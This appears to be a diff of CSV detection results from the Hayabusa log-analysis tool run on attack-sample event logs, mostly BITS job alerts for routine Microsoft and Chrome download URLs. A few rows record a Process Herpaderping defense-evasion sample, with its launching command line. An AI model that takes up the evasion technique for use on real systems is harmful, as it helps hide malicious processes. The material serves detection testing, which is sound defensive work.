+2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,informational,Process Creation,"Command: "".\samir.exe""  :  Path: C:\Users\bouss\Downloads\samir.exe  :  User: LAPTOP-JU4M3I0E\bouss  :  Parent Command: ProcessHerpaderping.exe  ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx
+2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: SetupBinary  :  URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe  :  URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:05.093 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.906 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.910 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 00:56:12.913 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 19:56:13.148 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: C:\Users\IEUser\AppData\Local\Temp\{9FF0B339-0202-4A5B-B73E-CFFB4FCBD124}-86.0.4240.193_86.0.4240.183_chrome_updater.exe  :  URL: http://r2---sn-5hne6nsy.gvt1.com/edgedl/release2/chrome/QX5U7YrFu2EjtutZ_UHwBg_86.0.4240.193/86.0.4240.193_86.0.4240.183_chrome_updater.exe?cms_redirect=yes&mh=qK&mip=213.127.67.111&mm=28&mn=sn-5hne6nsy&ms=nvh&mt=1605092117&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 21:44:50.465 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 23:12:22.524 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aULGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-12 23:12:25.568 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:12:09.946 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aYFdj.img?w=100&h=100&m=6&tilesize=medium&x=703&y=371&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-13 19:31:57.260 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-14 04:57:22.022 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:47:59.752 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-15 20:48:00.273 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 21:31:35.114 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Font Download  :  URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:53.156 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-16 22:57:54.168 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:01.832 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: PreSignInSettingsConfigJSON  :  URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 02:41:02.662 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: UpdateDescriptionXml  :  URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
+2020-11-18 06:09:43.966 +09:00,MSEDGEWIN10,59,informational,Bits Job Creation,Job Title: Push Notification Platform Job: 1  :  URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1b6mGJ.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx
